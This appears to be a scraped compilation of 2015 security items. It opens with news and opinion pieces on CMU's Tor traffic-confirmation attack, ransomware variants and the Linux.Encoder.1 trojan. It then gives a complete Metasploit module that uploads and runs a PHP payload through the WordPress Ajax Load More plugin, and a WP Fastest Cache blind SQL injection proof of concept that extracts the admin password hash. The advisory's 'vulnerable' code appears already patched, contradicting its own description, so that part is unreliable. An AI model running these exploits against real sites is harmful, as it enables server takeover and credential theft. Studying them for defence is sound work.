You might wonder why this is important. After all, the crimes we're talking about are pretty disturbing. One defendant is accused of possessing child pornography, and if the allegations are true, the other was a staff member on Silk Road 2.0. If CMU really did conduct Tor de-anonymization research for the benefit of the FBI, the people they identified were allegedly not doing the nicest things. It's hard to feel particularly sympathetic.

Except for one small detail: there's no reason to believe that the defendants were the only people affected.

If the details of the attack are as we understand them, a group of academic researchers deliberately took control of a significant portion of the Tor network. Without oversight from the University research board, they exploited a vulnerability in the Tor protocol to conduct a traffic confirmation attack, which allowed them to identify Tor client IP addresses and hidden services. They ran this attack for five months and potentially de-anonymized thousands of users.

It's quite possible that these researchers exercised strict protocols to ensure that they didn't accidentally de-anonymize innocent bystanders. This would be standard procedure in any legitimate research involving human subjects, particularly research that has the potential to harm. If the researchers did take such steps, it would be nice to know about them. CMU hasn't even admitted to the scope of the research project, nor has it published any results, so we just don't know.

While most of the computer science researchers I know are fundamentally ethical people, as a community we have a blind spot when it comes to the ethical issues in our field. There's a view in our community that Institutional Review Boards are for medical researchers, and we've somehow been accidentally caught up in machinery that wasn't meant for us. And I get this—IRBs are unpleasant to work with. Sometimes the machinery is wrong.

But there's also a view that computer security research can't really hurt people, so there's no real reason for this sort of ethical oversight machinery in the first place. This is dead wrong, and if we want to be taken seriously as a mature field, we need to do something about it.

We may need different machinery, but we need something. That something begins with the understanding that active attacks that affect vulnerable users can be dangerous and should never be conducted without rigorous oversight—if they must be conducted at all. It begins with the idea that universities should have uniform procedures for both faculty researchers and quasi-government organizations like CERT if they live under the same roof. It begins with CERT and CMU explaining what went on with their research rather than treating it like an embarrassment to be swept under the rug.

Most importantly, it begins with researchers looking beyond their own research practices. So far, the response to the Tor news has been a big shrug. It's wonderful that most of our community is responsible. But that doesn't matter if we're willing to look the other way when people in our community aren't.

Fonte: http://arstechnica.com/security/2015/11/why-the-attack-on-tor-matters/


More ransomware shenanigans

More ransomware shenanigans

Recently, an update of the infamous CryptoWall ransomware (or cryptoware) was released - you can read more about that particular ransomware here: CryptoWall 4.0 released with new Features such as Encrypted File Names

Additionally, another ransomware variant has made a return, read more about that one here:
“Offline” Ransomware Encrypts Your Data without C&C Communication

And let's not forget about this one either: Chimera Ransomware focuses on business computers

Did I mention yet there's ransomware for Linux as well? Have a look at Linux.Encoder.1 while you're at it.

... But wait, there's more! You've guessed it, yet another ransomware variant has returned. I wonder what's going on these days, the (cyber)criminals seem to get even more competitive.

Lawrence Abrams over at Bleeping Computer recently wrote an article about the variant we have here as well, as we have caught an updated variant of Poshcoder or Poshkoder or Power Worm:
Shoddy Programming causes new Ransomware to destroy your Data

Fonte: http://bartblaze.blogspot.it/2015/11/more-ransomware-shenanigans.html


Linux Crypto Ransomware Issue Hits 40,000 Sites

Linux Crypto Ransomware Issue Hits 40,000 Sites

RUSSIAN ANTIVIRUS OUTFIT Dr Web has carried on studying the Linux.Encoder.1 trojan threat and reported some more bad news about increased infection.

The firm revealed the problem already, but now it has more information. While before we spoke of infected parties that ran into the tens, now, we have a lot more zeroes to deal with and a bigger picture to look at.

"The attack scheme shows that cybercriminals do not actually need root privileges to compromise web servers running Linux and encrypt files," explained the firm.

"Moreover, the Trojan still poses a serious threat to Internet resources owners, especially taking into account that many popular CMSes have unfixed vulnerabilities, and some webmasters either disregard the necessity of timely updates or just use outdated versions of CMSes."

According to the studies there might be as many as 2,000 impacted sites, each with various degrees of threat. That was yesterday, we have carried out the same research, a Google search for "README_FOR_DECRYPT.txt" and found that the number of results is now in the 40,000 region.

According to the studies there might be as many as 2,000 impacted sites, each with various degrees of threat. Dr Web said that the exploit has flaws, and recommended that no one attempt to deal with the encrypted files, or the hijackers. Rather, the advice goes, you should call the police.

Last week the firm was warning that so far tens of users have fallen victim to infection. Infected parties are webmasters, and the files are those associated with the serving of webpages.

"Judging from the directories in which the Trojan encrypts files, one can draw a conclusion that the main target of cybercriminals is website administrators whose machines have web servers deployed on," it said.

"There have been some cases, when virus makers exploited the CMS Magento vulnerability to launch attacks on web servers. Doctor Web security researchers presume that at least tens of users have already fallen victim to this Trojan."

Once Linux.Encoder.1 is on board – Dr Web would not reveal how that happens – it downloads extra files and fetches RSA keys. After that, things get really bad.

"Once launched with administrator privileges, the Trojan dubbed Linux.Encoder.1 downloads files containing cybercriminals' demands and a file with the path to a public RSA key. After that, the malicious program starts as a daemon and deletes the original files," added the firm.

"Subsequently, the RSA key is used to store AES keys, which will be employed by the Trojan to encrypt files on the infected computer."

The Trojan makes merry through a Linux system encrypting all of the files in directories that it comes across. In case its intention is not clear, it marks files as encrypted and sets out its demands.

"First, Linux.Encoder.1 encrypts all files in home directories and directories related to website administration. Then the Trojan recursively traverses the whole file system starting with the directory from which it is launched; next time, starting with a root directory ("/"). At that, the Trojan encrypts only files with specified extensions and only if a directory name starts with one of the strings indicated by cybercriminals," added the company.

"Compromised files are appended by the malware with the .encrypted extension. Into every directory that contains encrypted files, the Trojan plants a file with a ransom demand – to have their files decrypted, the victim must pay a ransom in the Bitcoin electronic currency."

The ransom demand is for the comparably low sum of one bitcoin, which is a few hundred dollars.

Fonte: http://www.theinquirer.net/inquirer/news/2433914/linux-webmasters-hit-with-encryption-ransomware-issue



WordPress Ajax Load More PHP Upload

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  # Module metadata. This is a post-authentication module: it needs a valid
  # WordPress account (WP_USERNAME / WP_PASSWORD) that can reach the plugin's
  # admin page. The weakness it exercises is that the plugin stores
  # user-supplied "repeater template" content in a PHP file inside a
  # web-reachable directory.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress Ajax Load More PHP Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary file upload in the WordPress Ajax Load More
        version 2.8.1.1. It allows to upload arbitrary php files and get remote code
        execution. This module has been tested successfully on WordPress Ajax Load More
        2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.
      },
      'Author'         =>
        [
          'Unknown', # Identify yourself || send a PR here
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['WPVDB', '8209']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Ajax Load More 2.8.1.1', {}]],
      'DisclosureDate' => 'Oct 10 2015',
      'DefaultTarget'  => 0
    ))

    # Both credentials are required and have no default: nothing below works
    # without a successful WordPress login.
    register_options(
      [
        OptString.new('WP_USERNAME', [true, 'A valid username', nil]),
        OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
      ], self.class
    )
  end

  # Version check based on the plugin's readme. The version given here,
  # 2.8.1.2, differs from the 2.8.1.1 named in the target and description;
  # presumably 2.8.1.2 is the first fixed release and the helper flags
  # anything older — confirm against the helper's semantics before trusting
  # the result.
  def check
    check_plugin_version_from_readme('ajax-load-more', '2.8.1.2')
  end

  # WordPress account used for the login (datastore option WP_USERNAME).
  def username
    datastore['WP_USERNAME']
  end

  # Password for that account (datastore option WP_PASSWORD).
  def password
    datastore['WP_PASSWORD']
  end

  # Fetches the plugin's repeater-templates admin page with the logged-in
  # session cookie and scrapes the alm_admin_nonce value out of the body.
  # The save action used in #exploit is gated on that nonce.
  # Returns the nonce string, or nil when the request fails or the pattern
  # is not found.
  def get_nonce(cookie)
    res = send_request_cgi(
      'method'    => 'GET',
      'uri'       => normalize_uri(wordpress_url_backend, 'admin.php'),
      'vars_get'  => {
        'page'    => 'ajax-load-more-repeaters'
      },
      'cookie'    => cookie
    )

    # The nonce is read from a JSON blob embedded in the page; the regex is
    # anchored on the surrounding text ('php","alm_admin_nonce":"...').
    if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/
      return Regexp.last_match[1]
    else
      return nil
    end
  end

  # Logs in, obtains the nonce, then posts the payload as the 'value' of the
  # plugin's "alm_save_repeater" AJAX action. The plugin stores that value as
  # the repeater template default.php under its core/repeater/ directory,
  # which the web server serves, so the final GET executes it.
  # Defensive note: the request sequence to look for in access logs is an
  # admin-ajax.php POST with action=alm_save_repeater followed by a GET to
  # wp-content/plugins/ajax-load-more/core/repeater/default.php; the fix is
  # for the plugin not to keep user-supplied template content in an
  # executable file.
  def exploit
    vprint_status("#{peer} - Trying to login as #{username}")
    cookie = wordpress_login(username, password)
    fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil?

    vprint_status("#{peer} - Trying to get nonce")
    nonce = get_nonce(cookie)
    fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil?

    vprint_status("#{peer} - Trying to upload payload")

    # This must be default.php — it matches the 'repeater' / 'type' values
    # of 'default' sent below (presumably the plugin derives the file name
    # from them; confirm against the plugin source).
    filename = 'default.php'

    print_status("#{peer} - Uploading payload")
    res = send_request_cgi(
      'method'      => 'POST',
      'uri'         => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
      'vars_post'   => {
        'action'    => 'alm_save_repeater',
        'value'     => payload.encoded,
        'repeater'  => 'default',
        'type'      => 'default',
        'alias'     => '',
        'nonce'     => nonce
      },
      'cookie'      => cookie
    )

    if res
      # Only the plugin's own success text counts as a write; any other
      # 200/non-200 response is reported as a permissions problem, which is
      # an assumption — the real cause may be a different plugin version.
      if res.code == 200 && res.body.include?('Template Saved Successfully')
        # Registers the bare file name, not the full plugin path, for
        # deletion when the session closes; whether that resolves to the
        # right file depends on the session's working directory — verify.
        register_files_for_cleanup(filename)
      else
        fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    # Trigger execution of the stored template by requesting it directly.
    print_status("#{peer} - Calling uploaded file")
    send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
    )
  end
end



WP Fastest Cache 0.8.4.8 Blind SQL Injection

# Exploit Title: WP Fastest Cache 0.8.4.8 Blind SQL Injection
# Date: 11-11-2015
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
 
1. Description
 
For this vulnerability, WP-Polls also needs to be installed.
 
Everyone can access wpfc_wppolls_ajax_request().
 
$_POST["poll_id"] is escaped with mysql_real_escape_string(), but it is then used in a numeric (unquoted) SQL context, where string escaping gives no protection.
 
File: wp-fastest-cache\inc\wp-polls.php
 
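public function wpfc_wppolls_ajax_request() {
  // Admin-AJAX handler that any caller can reach (see the advisory above).
  // The original code ran strip_tags() + mysql_real_escape_string() on
  // poll_id, but the value is passed to check_voted() unquoted, in a numeric
  // SQL position — the proof of concept injects "0 UNION ..." without a
  // single quote character — so string escaping does not help there.
  // Coercing to an integer removes the injection surface: anything that is
  // not a number becomes 0, and a missing parameter is treated the same way
  // instead of raising a notice.
  $id = isset($_POST["poll_id"]) ? (int) $_POST["poll_id"] : 0;

  $result = check_voted($id);

  // Responds with a plain "true"/"false" body and ends the request, which is
  // the usual shape for a WordPress AJAX handler.
  if($result){
    echo "true";
  }else{
    echo "false";
  }
  die();
}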
 
http://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html
 
2. Proof of Concept
 
<!-- Proof of concept as published. Defensive note: the request is a POST to
     admin-ajax.php with action=wpfc_wppolls_ajax_request carrying a poll_id
     that is not a plain integer; the SLEEP(5) makes a successful probe show
     up as a roughly five-second response time, which is what a time-based
     blind injection looks like in web server logs. -->
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request">
  <input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- ">
  <input type="submit" value="Send">
</form>
 
3. Solution:
 
Update to version 0.8.4.9
